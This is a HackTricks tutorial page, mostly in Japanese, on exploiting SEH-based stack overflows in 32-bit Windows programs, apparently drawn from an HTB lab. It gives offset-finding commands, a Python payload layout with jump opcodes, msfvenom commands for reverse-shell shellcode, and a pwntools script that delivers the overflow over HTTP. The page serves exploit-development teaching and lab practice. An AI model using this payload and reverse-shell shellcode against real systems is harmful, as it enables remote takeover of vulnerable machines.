HackTricksWindows SEH-based Stack Overflow Exploitation (nSEH/SEH)
Reading time: 9 minutes
tip
AWSハッキングを学び、実践する:
HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:
HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
SEH-based exploitation は、スタック上に保存された Structured Exception Handler チェーンを悪用する古典的な x86 Windows の手法です。スタックバッファオーバーフローで以下の 2 つの 4 バイトフィールドが上書きされると、
- nSEH: pointer to the next SEH record, and
- SEH: pointer to the exception handler function
攻撃者は実行制御を奪うことができます:
- SEH を non-protected module にある POP POP RET ガジェットのアドレスに設定し、例外がディスパッチされるとそのガジェットが攻撃者制御のバイトにリターンするようにすること、および
- nSEH を使って実行をリダイレクト(通常は short jump)し、shellcode が配置されている大きなオーバーフローしたバッファに戻すこと。
この手法は 32-bit プロセス(x86)に特有です。モダンなシステムでは、gadget 用に SafeSEH と ASLR が無効のモジュールを優先してください。C-strings や HTTP パースのため、0x00, 0x0a, 0x0d (NUL/CR/LF) などが bad characters に含まれやすいです。
Finding exact offsets (nSEH / SEH)
- プロセスをクラッシュさせ、SEH チェーンが上書きされていることを確認する(例: x32dbg/x64dbg では SEH view を確認)。
- オーバーフローするデータとして cyclic pattern を送り、nSEH と SEH に入る 2 つの dword のオフセットを算出する。
Example with peda/GEF/pwntools on a 1000-byte POST body:
# generate pattern (any tool is fine)
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
# or
python3 -c "from pwn import *; print(cyclic(1000).decode())"
# after crash, note the two 32-bit values from SEH view and compute offsets
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x32424163 # nSEH
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x41484241 # SEH
# ➜ offsets example: nSEH=660, SEH=664
それらの位置にマーカーを置いて検証する(例: nSEH=b"BB", SEH=b"CC")。クラッシュを再現可能にするため、合計長は一定に保つ。
POP POP RET (SEH gadget) の選択
SEHフレームを解放して nSEH バイトに戻すために POP POP RET シーケンスが必要。SafeSEH が無効で、できれば ASLR も無効のモジュールから探す:
- Mona (Immunity/WinDbg):
!mona modules、次に!mona seh -m modulename。 - x64dbg plugin ERC.Xdbg:
ERC --SEHで POP POP RET ガジェットと SafeSEH の状態を一覧表示する。
リトルエンディアンで書き込んだときに badchars を含まないアドレスを選ぶ(例: p32(0x004094D8))。保護が許すなら脆弱なバイナリ内のガジェットを優先する。
Jump-back technique (short + near jmp)
nSEH はわずか4バイトで、最大でも2バイトの short jump(EB xx)とパディングが収まる程度。バッファの先頭まで数百バイト戻る必要がある場合は、nSEH の直前に5バイトの near jump を置き、nSEH からの short jump でそれに繋ぐ。
nasmshell を使って:
nasm> jmp -660 ; too far for short; near jmp is 5 bytes
E967FDFFFF
nasm> jmp short -8 ; 2-byte short jmp fits in nSEH (with 2 bytes padding)
EBF6
nasm> jmp -652 ; 8 bytes closer (to account for short-jmp hop)
E96FFDFFFF
nSEH が offset 660 にある 1000-byte payload のレイアウト案:
buffer_length = 1000
payload = b"\x90"*50 + shellcode # NOP sled + shellcode at buffer start
payload += b"A" * (660 - 8 - len(payload)) # pad so we are 8 bytes before nSEH
payload += b"\xE9\x6F\xFD\xFF\xFF" + b"EEE" # near jmp -652 (5B) + 3B padding
payload += b"\xEB\xF6" + b"BB" # nSEH: short jmp -8 + 2B pad
payload += p32(0x004094D8) # SEH: POP POP RET (no badchars)
payload += b"D" * (buffer_length - len(payload))
Execution flow:
- 例外が発生し、ディスパッチャが上書きされた SEH を使用します。
- POP POP RET によりスタックが巻き戻され、nSEH に移ります。
- nSEH が
jmp short -8を実行し、5-byte near jump に入ります。 - Near jump はバッファの先頭に着地し、そこで NOP sled + shellcode が配置されています。
Bad characters
完全な badchar 文字列を構築し、クラッシュ後のスタックメモリと比較して、ターゲットのパーサによって破損するバイトを除去します。HTTP ベースのオーバーフローでは、\x00\x0a\x0d はほぼ常に除外されます。
badchars = bytes([x for x in range(1,256)])
payload = b"A"*660 + b"BBBB" + b"CCCC" + badchars # position appropriately for your case
Shellcode generation (x86)
msfvenom を badchars とともに使用してください。小さな NOP sled は着弾のばらつきを許容するのに役立ちます。
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> \
-b "\x00\x0a\x0d" -f python -v sc
オンザフライで生成する場合、hex形式は埋め込んでPythonでunhexするのに便利です:
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> \
-b "\x00\x0a\x0d" -f hex
HTTP経由での送信(正確な CRLF + Content-Length)
脆弱なベクターが HTTP リクエスト本文である場合、正確な CRLFs と Content-Length を含む生のリクエストを作成し、サーバーがオーバーフローする本文全体を読み取るようにします。
# pip install pwntools
from pwn import remote
host, port = "<TARGET_IP>", 8080
body = b"A" * 1000 # replace with the SEH-aware buffer above
req = f"""POST / HTTP/1.1
Host: {host}:{port}
User-Agent: curl/8.5.0
Accept: */*
Content-Length: {len(body)}
Connection: close
""".replace('\n','\r\n').encode() + body
p = remote(host, port)
p.send(req)
print(p.recvall(timeout=0.5))
p.close()
ツール
- x32dbg/x64dbg を使って SEHチェーン を観察し、クラッシュのトリアージを行う。
- ERC.Xdbg (x64dbg plugin) を使って SEH gadget を列挙する:
ERC --SEH. - Mona を代替として使用:
!mona modules,!mona seh. - nasmshell を使って短い/近いジャンプをアセンブルし、生のオペコードをコピーする。
- pwntools を使って精密なネットワークペイロードを作成する。
注意点と留意事項
- x86 プロセスにのみ適用されます。x64 は異なる SEH スキームを使用しており、SEH ベースの exploitation は一般的に実用的ではありません。
- SafeSEH と ASLR を持たない module 内の gadget を優先する。さもなければ、プロセスにロードされている保護されていない module を見つける。
- クラッシュ時に自動的に再起動する Service watchdog は、反復的な exploit 開発を容易にすることがある。
参考文献
- HTB: Rainbow – SEH overflow to RCE over HTTP (0xdf)
- ERC.Xdbg – Exploit Research Plugin for x64dbg (SEH search)
- Corelan – Exploit writing tutorial part 7 (SEH)
- Mona.py – WinDbg/Immunity helper
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。